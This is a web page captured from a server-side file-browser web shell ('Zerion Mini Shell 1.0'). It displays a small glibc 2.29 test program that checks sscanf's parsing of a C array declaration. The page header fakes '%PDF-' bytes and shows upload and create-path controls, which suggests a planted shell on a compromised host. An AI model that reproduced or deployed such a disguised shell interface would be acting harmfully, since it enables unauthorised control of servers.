%PDF- %PDF-
Mini Shell

Mini Shell

Direktori : /glibc-2.29/stdio-common/
Upload File :
Create Path :
Current File : //glibc-2.29/stdio-common/bug11.c

#include <stdio.h>
#include <string.h>

int
main (int argc, char *argv[])
{
  int ret;
  char buf [1024] = "Ooops";

  ret = sscanf ("static char Term_bits[] = {", "static char %s = {", buf);
  printf ("ret: %d, name: %s\n", ret, buf);

  return strcmp (buf, "Term_bits[]") != 0 || ret != 1;
}

Zerion Mini Shell 1.0